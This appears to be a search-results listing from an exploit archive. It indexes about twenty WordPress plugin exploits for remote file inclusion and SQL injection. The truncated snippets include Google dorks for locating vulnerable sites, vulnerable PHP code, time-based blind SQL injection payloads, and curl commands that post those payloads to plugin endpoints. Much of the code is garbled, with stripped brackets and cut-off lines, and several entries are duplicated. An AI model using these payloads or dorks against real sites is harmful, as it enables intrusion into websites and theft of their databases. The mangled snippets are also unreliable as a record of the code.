1370 matches found
Wordpress Mailing List Plugin 1.3.2 Remote File Inclusion
Exploit for php platform in category web applications Exploit Title: Mailing List Wordpress plugin RFI Google Dork: inurl:wp-content/plugins/mailz Date: 09/19/2011 Author: Ben Schmidt supernothing AT spareclockcycles.org @supernothing Software Link:...
Wordpress Annonces Plugin 1.2.0.0 Remote File Inclusion
Exploit for php platform in category web applications Exploit Title: Annonces Wordpress plugin RFI Google Dork: inurl:wp-content/plugins/annonces Date: 09/19/2011 Author: Ben Schmidt supernothing AT spareclockcycles.org @supernothing Software Link:...
Wordpress TheCartPress Plugin 1.1.1 Remote File Inclusion
Exploit for php platform in category web applications Exploit Title: Thecartpress Wordpress plugin RFI Google Dork: inurl:wp-content/plugins/thecartpress Date: 09/19/2011 Author: Ben Schmidt supernothing AT spareclockcycles.org @supernothing Software Link:...
WordPress Auctions 1.8.8 SQL Injection
Exploit Title: WordPress Auctions plugin @AlligatorTeam Software Link: http://downloads.wordpress.org/plugin/wp-auctions.zip Version: 1.8.8 tested --------------- PoC --------------- URL:...
WordPress Plugin Tune Library 2.17 - SQL Injection
Exploit Title: WordPress Tune Library plugin prefix . "tracks where artist != '' and artist like '" .$artistletter . "%' order by artist";...
WordPress Plugin Tune Library 2.17 - SQL Injection
Exploit Title: WordPress Tune Library plugin prefix . "tracks where artist != '' and artist like '" .$artistletter . "%' order by artist";...
WordPress Plugin A to Z Category Listing 1.3 - SQL Injection
Exploit Title: WordPress A to Z Category Listing plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 --------------- Vulnerable code --------------- $initletter = $GET'R'; $sql = "select from ".$tableprefix."terms wpt,".$tableprefix."termtaxonomy wptt where wpt.name like...
WordPress Paid Downloads 2.01 SQL Injection
Exploit Title: WordPress Paid Downloads plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 --------------- Vulnerable code --------------- $downloadkey = $GET"downloadkey"; $sql = "SELECT FROM ".$wpdb-prefix."pddownloadlinks WHERE downloadkey = '".$downloadkey."'"; $linkdetails =...
WordPress Plugin Paid Downloads 2.01 - SQL Injection
Exploit Title: WordPress Paid Downloads plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 --------------- Vulnerable code --------------- $downloadkey = $GET"downloadkey"; $sql = "SELECT FROM ".$wpdb-prefix."pddownloadlinks WHERE downloadkey = '".$downloadkey."'"; $linkdetails =...
WordPress Community Events 1.2.1 SQL Injection
Exploit Title: WordPress Community Events plugin getblogprefix . "ceevents where eventid = " . $eventid;...
WordPress WP Forum Server 1.7 SQL Injection
Exploit Title: WordPress WP Forum Server plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20&editpostsubject=test&message=dummy&threadid=1 e.g. curl --data "editpostsubmit=1&editpostid=-1 AND...
WordPress SCORM Cloud 1.0.6.6 SQL Injection
Exploit Title: WordPress SCORM Cloud plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 e.g.: curl --data "action=addAnonRegGetLaunchUrl&inviteid=-1' AND 1=IF21,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0-- " http://www.site.com/wp-content/plugins/scormcloud/ajax.php...
WordPress Plugin post highlights 2.2 - SQL Injection
Exploit Title: WordPress post highlights plugin posts WHERE posttype='attachment' AND postparent='$id'";...
WordPress Tweet Old Post 3.2.5 SQL Injection
Exploit Title: WordPress Tweet Old Post plugin Software Link: http://downloads.wordpress.org/plugin/tweet-old-post.zip Version: 3.2.5 tested --------------- PoC POST data --------------- URL: http://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts POST Data:...
WordPress Post Highlights 2.2 SQL Injection
Exploit Title: WordPress post highlights plugin posts WHERE posttype='attachment' AND postparent='$id'";...
WordPress Zotpress 4.4 SQL Injection
Exploit Title: WordPress Zotpress plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0%23 --------------- Vulnerable code --------------- if $mzrapiuserid == false && $mzrinclude == false && isset$GET'apiuserid' && pregmatch"/^0-9+$/", $GET'apiuserid' $mzrapiuserid = trim$GET'apiuserid';...
WordPress Plugin Facebook Opengraph Meta 1.0 - SQL Injection
Exploit Title: WordPress Facebook Opengraph Meta Plugin plugin getvar"SELECT COUNT AS count FROM $wpdb-postmeta WHERE metakey = 'OgMeta'"; $count = $result'count'; if $count 0 $totalpages = ceil$count/$limit; else $totalpages = 0; if $page $totalpages $page=$totalpages; $start = $limit$page -...
WordPress VideoWhisper Video Presentation 1.1 SQL Injection
Exploit Title: WordPress VideoWhisper Video Presentation plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 e.g.: curl --data "s=-1' AND 1=IF21,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0-- " http://www.site.com/wp-content/plugins/videowhisper-video-presentation/vp/cstatus.php...
WordPress Plugin VideoWhisper Video Presentation 1.1 - SQL Injection
Exploit Title: WordPress VideoWhisper Video Presentation plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 e.g.: curl --data "s=-1' AND 1=IF21,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0-- " http://www.site.com/wp-content/plugins/videowhisper-video-presentation/vp/cstatus.php...
WordPress SearchAutocomplete plugin <= 1.0.8 SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: WordPress SearchAutocomplete plugin getresults"SELECT posttitle As name, ID as postid, guid AS url, 1 cnt FROM ".$wpdb-prefix."posts t WHERE poststatus='publish' and posttype='post' OR posttype='page' and postdate NOW and...